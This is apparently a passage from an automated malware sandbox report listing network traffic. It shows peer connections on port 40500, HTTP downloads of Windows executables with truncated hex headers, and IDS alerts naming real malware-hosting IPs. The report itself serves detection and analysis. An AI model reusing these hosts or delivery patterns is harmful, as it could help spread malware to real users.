                          Source: global trafficTCP traffic: 192.168.2.11:50065 -> 201.138.180.213:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50067 -> 2.134.250.184:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50069 -> 95.56.98.17:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50074 -> 212.22.213.217:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50076 -> 95.142.87.201:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50079 -> 213.230.99.184:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50081 -> 90.156.160.54:40500
                          Source: global trafficTCP traffic: 192.168.2.11:50090 -> 213.230.126.39:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 95.81.102.72:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 92.38.19.10:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 45.150.24.42:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 2.187.91.108:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 109.74.69.43:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 77.44.198.123:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 2.133.136.145:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 2.176.72.136:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 89.236.217.71:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 89.219.115.156:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 2.179.117.33:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 217.30.162.161:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 95.59.165.102:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 5.236.121.2:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 187.230.224.82:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 154.71.253.54:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 92.124.152.236:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 90.156.163.10:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 37.120.247.128:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 151.242.48.19:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 89.218.218.206:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 178.67.165.88:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 31.47.175.39:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 189.173.142.192:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 198.163.204.6:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 85.9.133.202:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 37.21.118.106:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 38.222.194.190:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 78.109.103.103:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 2.133.70.66:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 5.76.0.203:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 2.176.94.43:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 2.190.224.152:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 189.167.22.36:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 90.156.163.98:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 212.13.170.223:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 89.249.62.7:40500
                          Source: global trafficUDP traffic: 192.168.2.11:62307 -> 2.177.40.206:40500
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:31:40 GMTContent-Type: application/octet-streamContent-Length: 10240Last-Modified: Sun, 24 Nov 2024 16:23:03 GMTConnection: keep-aliveETag: "674352e7-2800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 64 0e 23 23 05 60 70 23 05 60 70 23 05 60 70 2a 7d f3 70 21 05 60 70 2a 7d f5 70 22 05 60 70 2a 7d e3 70 36 05 60 70 04 c3 1b 70 28 05 60 70 23 05 61 70 18 05 60 70 2a 7d e4 70 20 05 60 70 2a 7d f1 70 22 05 60 70 52 69 63 68 23 05 60 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 52 43 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 0e 00 00 00 16 00 00 00 00 00 00 e1 16 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 d6 e4 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 24 00 00 8c 00 00 00 00 40 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 23 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3a 0c 00 00 00 10 00 00 00 0e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 0a 00 00 00 20 00 00 00 0c 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 03 00 00 00 30 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 40 00 00 00 04 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 06 02 00 00 00 50 00 00 00 04 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:31:44 GMTContent-Type: application/octet-streamContent-Length: 80896Last-Modified: Tue, 12 Nov 2024 22:30:51 GMTConnection: keep-aliveETag: "6733d71b-13c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cd d6 33 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e4 00 00 00 64 00 00 00 00 00 00 90 75 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 24 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f2 e2 00 00 00 10 00 00 00 e4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fa 33 00 00 00 00 01 00 00 34 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 28 2f 00 00 00 40 01 00 00 20 00 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:04 GMTContent-Type: application/octet-streamContent-Length: 449536Last-Modified: Mon, 02 Dec 2024 07:59:26 GMTConnection: keep-aliveETag: "674d68de-6dc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 66 03 00 00 00 01 00 be c7 02 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 79 07 00 28 00 00 00 00 c0 07 00 e0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 f0 22 00 00 40 6e 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 04 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 43 7b 03 00 00 10 00 00 00 7c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 62 73 73 00 00 01 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 2e 72 64 61 74 61 00 00 9a ef 02 00 00 90 04 00 00 f0 02 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 3b 00 00 00 80 07 00 00 32 00 00 00 70 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 14 00 00 00 c0 07 00 00 16 00 00 00 a2 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 22 00 00 00 e0 07 00 00 24 00 00 00 b8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:12 GMTContent-Type: application/octet-streamContent-Length: 5827584Last-Modified: Fri, 27 Sep 2024 20:03:46 GMTConnection: keep-aliveETag: "66f70fa2-58ec00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 b7 01 f7 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 94 01 00 00 e8 58 00 00 1e 00 00 b0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 70 59 00 00 04 00 00 91 87 59 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 59 00 34 0a 00 00 00 50 59 00 80 03 00 00 00 d0 58 00 58 11 00 00 00 00 00 00 00 00 00 00 00 60 59 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b7 58 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 22 59 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 93 01 00 00 10 00 00 00 94 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 c0 de 56 00 00 b0 01 00 00 e0 56 00 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 f0 39 00 00 00 90 58 00 00 3a 00 00 00 78 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 58 11 00 00 00 d0 58 00 00 12 00 00 00 b2 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 f4 0e 00 00 00 f0 58 00 00 10 00 00 00 c4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 80 1c 00 00 00 00 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 34 0a 00 00 00 20 59 00 00 0c 00 00 00 d4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 60 00 00 00 00 30 59 00 00 02 00 00 00 e0 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 40 59 00 00 02 00 00 00 e2 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 80 03 00 00 00 50 59 00 00 04 00 00 00 e4 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 30 03 00 00 00 60 59 00 00 04 00 00 00 e8 58 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: Joe Sandbox ViewIP Address: 91.202.233.141 91.202.233.141
                          Source: Joe Sandbox ViewASN Name: TCIIR TCIIR
                          Source: Joe Sandbox ViewASN Name: KAZTELECOM-ASKZ KAZTELECOM-ASKZ
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49756 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49721 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.11:49710 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49775 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.11:49775 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49747 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49793 -> 185.215.113.84:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49781 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49800 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49819 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49833 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49838 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49860 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49903 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49912 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49922 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49933 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49941 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49963 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49971 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49981 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49991 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49953 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50003 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50020 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50028 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50033 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50035 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50041 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50048 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50046 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50054 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50057 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50050 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50068 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50070 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50080 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50055 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50052 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50059 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50071 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50073 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50089 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50078 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50082 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50064 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50077 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50087 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50084 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50075 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50045 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50038 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50031 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50010 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50085 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50063 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50066 -> 185.215.113.66:80
